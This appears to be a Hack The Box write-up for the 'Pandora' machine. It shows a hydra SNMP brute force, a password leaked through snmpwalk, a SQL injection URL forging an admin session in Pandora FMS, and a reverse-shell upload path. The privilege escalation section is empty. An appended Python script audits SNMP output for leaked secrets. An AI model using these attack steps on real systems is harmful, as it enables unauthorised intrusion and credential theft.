Pandora - 10.10.11.136
===

###### tags: `HTB` `Easy`

# Enumeration

## Port Scan

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## SNMP (161 UDP)

```
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.10.11.136 snmp
[161][snmp] host: 10.10.11.136 password: public
```

The SNMP community string (password) is `public`.

```
snmpwalk -v 2c pandora.htb -c public |grep STRING:
iso.3.6.1.2.1.25.4.2.1.5.827 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
```

# Exploitation

The SSH password for user **daniel** is **HotelBabylon23**.

# Post-Exploitation

## Enumeration

https://nvd.nist.gov/vuln/detail/CVE-2020-26518

### Obtaining the User

```
http://localhost/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO
localhost/pandora_console/images/phprev.php
```

## Privilege Escalation

# Links
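
Defender-side follow-up to the SNMP section above: the credential leaked because a process's arguments are readable through the process table (`hrSWRunParameters`, OID `1.3.6.1.2.1.25.4.2.1.5`) by anyone who knows the community string. The script below is an added example, not part of the original write-up; it audits saved `snmpwalk` output from your own hosts for secrets passed on the command line. The flag list, function names and sample lines are assumptions constructed for illustration.

```python
import re

# hrSWRunParameters column of the HOST-RESOURCES-MIB process table
HR_SW_RUN_PARAMETERS = "1.3.6.1.2.1.25.4.2.1.5"

# Flags that usually carry a secret (assumed list; extend it for your estate)
SECRET_ARG = re.compile(
    r"(^|\s)(-p|--password|--pass|--token|--secret|--api-key)(?:\s+|=)(\S+)"
)
# One line of snmpwalk output: <oid> = STRING: "<value>"
LINE = re.compile(r'^(\S+)\s*=\s*STRING:\s*"(.*)"$')


def _redact(match):
    # Purely numeric values are almost always ports, not secrets: leave them.
    if match.group(3).isdigit():
        return match.group(0)
    return f"{match.group(1)}{match.group(2)} <redacted>"


def find_exposed_secrets(snmpwalk_output):
    """Return (pid, flags, redacted_args) for each process leaking a secret."""
    findings = []
    for line in snmpwalk_output.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        # snmpwalk prints the root arc as "iso" or as ".1"; normalise both.
        oid = re.sub(r"^iso", "1", m.group(1)).lstrip(".")
        if not oid.startswith(HR_SW_RUN_PARAMETERS + "."):
            continue
        pid, args = oid.rsplit(".", 1)[1], m.group(2)
        flags = [h.group(2) for h in SECRET_ARG.finditer(args)
                 if not h.group(3).isdigit()]
        if flags:
            findings.append((pid, flags, SECRET_ARG.sub(_redact, args)))
    return findings


# Constructed sample input (placeholder account name and password)
SAMPLE = """\
iso.3.6.1.2.1.25.4.2.1.2.827 = STRING: "sh"
iso.3.6.1.2.1.25.4.2.1.5.827 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u svc_user -p EXAMPLE-PASSWORD'"
iso.3.6.1.2.1.25.4.2.1.5.901 = STRING: "-D -p 2222"
iso.3.6.1.2.1.25.4.2.1.5.955 = STRING: "--foreground"
"""

if __name__ == "__main__":
    for pid, flags, args in find_exposed_secrets(SAMPLE):
        print(f"pid {pid}: secret passed via {', '.join(flags)}: {args}")
```

Any finding means the secret should be rotated and moved out of the command line (environment file or config with restricted permissions), and the community string and SNMP view should be tightened so the process table is not world-readable.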